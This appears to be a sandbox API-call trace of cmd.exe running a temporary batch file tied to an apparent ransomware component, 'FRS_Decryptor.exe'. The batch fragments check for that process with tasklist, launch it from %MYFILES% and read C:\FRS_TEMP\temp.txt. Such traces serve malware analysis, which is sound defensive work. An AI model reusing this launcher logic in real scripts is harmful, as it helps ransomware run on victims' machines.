[0120.207] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.207] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0120.208] GetLastError () returned 0x2 [0120.208] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.208] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0b0 [0120.208] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0120.208] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0120.208] GetLastError () returned 0x2 [0120.208] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59bb0 [0120.208] FindClose (in: hFindFile=0xd59bb0 | out: hFindFile=0xd59bb0) returned 1 [0120.208] GetFileType (hFile=0x28) returned 0x2 [0120.208] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0120.208] _dup (_FileHandle=1) returned 3 [0120.208] _close (_FileHandle=1) returned 0 [0120.208] _wcsicmp (_String1="nul", _String2="con") returned 11 [0120.208] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0120.208] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0120.208] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0120.209] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0120.209] SetErrorMode (uMode=0x0) returned 0x0 [0120.209] SetErrorMode (uMode=0x1) returned 0x0 [0120.209] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0120.209] SetErrorMode (uMode=0x0) returned 0x1 [0120.209] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0120.209] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0120.209] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.209] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.209] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0120.209] GetLastError () returned 0x2 [0120.209] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.209] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0120.209] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0120.209] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0120.209] GetLastError () returned 0x2 [0120.209] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0120.209] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0120.209] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0120.210] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0120.210] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0120.210] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0120.210] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0120.211] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0120.211] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0120.211] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x318, dwProcessId=0x820, dwThreadId=0xbe0)) returned 1 [0120.213] CloseHandle (hObject=0x318) returned 1 [0120.213] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0120.213] GetEnvironmentStringsW () returned 0xd30508* [0120.213] FreeEnvironmentStringsA (penv="=") returned 1 [0120.213] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0122.271] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0122.271] CloseHandle (hObject=0x36c) returned 1 [0122.271] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0122.271] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0122.271] GetEnvironmentStringsW () returned 0xd7e510* [0122.271] FreeEnvironmentStringsA (penv="=") returned 1 [0122.271] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0122.271] GetEnvironmentStringsW () returned 0xd30508* [0122.271] FreeEnvironmentStringsA (penv="=") returned 1 [0122.271] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0122.271] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0122.271] _close (_FileHandle=3) returned 0 [0122.272] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.272] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0122.272] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.272] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0122.272] _get_osfhandle (_FileHandle=0) returned 0x24 [0122.272] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0122.272] SetConsoleInputExeNameW () returned 0x1 [0122.272] GetConsoleOutputCP () returned 0x1b5 [0122.272] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0122.272] SetThreadUILanguage (LangId=0x0) returned 0x409 [0122.273] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0122.273] _open_osfhandle (_OSFileHandle=0x24c, _Flags=8) returned 3 [0122.273] _get_osfhandle (_FileHandle=3) returned 0x24c [0122.273] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0122.273] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0122.273] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0122.273] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0122.273] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0122.273] GetFileType (hFile=0x24c) returned 0x1 [0122.273] _get_osfhandle (_FileHandle=3) returned 0x24c [0122.273] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0122.273] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0122.273] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0122.273] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0122.274] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0122.274] GetFileType (hFile=0x24c) returned 0x1 [0122.274] _get_osfhandle (_FileHandle=3) returned 0x24c [0122.274] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0122.274] _tell (_FileHandle=3) returned 2627 [0122.274] _close (_FileHandle=3) returned 0 [0122.274] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0122.274] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0122.274] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0122.274] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0122.274] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0122.278] feof (_File=0x76ea4c68) returned 0 [0122.278] ferror (_File=0x76ea4c68) returned 0 [0122.278] fgets (in: _Buf=0xd81598, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0122.747] feof (_File=0x76ea4c68) returned 0 [0122.747] ferror (_File=0x76ea4c68) returned 0 [0122.747] fgets (in: _Buf=0xd84796, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0122.785] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0122.786] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd430f6, cbMultiByte=78, lpWideCharStr=0xd430a8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0122.786] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0122.786] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0122.786] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0122.786] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0122.787] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0122.787] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.787] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0122.787] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0122.787] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0122.787] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.787] GetFileType (hFile=0x260) returned 0x1 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0122.787] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0122.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0122.787] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.787] GetFileType (hFile=0x260) returned 0x1 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0122.787] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0122.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0122.787] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.787] GetFileType (hFile=0x260) returned 0x1 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0122.787] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.787] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.787] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.787] GetFileType (hFile=0x260) returned 0x1 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.787] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.787] SetFilePointer (in: hFile=0x260, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0122.788] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0122.788] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.788] GetFileType (hFile=0x260) returned 0x1 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0122.788] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0122.788] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0122.788] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.788] GetFileType (hFile=0x260) returned 0x1 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0122.788] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0122.788] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0122.788] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.788] GetFileType (hFile=0x260) returned 0x1 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0122.788] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0122.788] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0122.788] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.788] GetFileType (hFile=0x260) returned 0x1 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0122.788] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0122.788] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0122.788] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 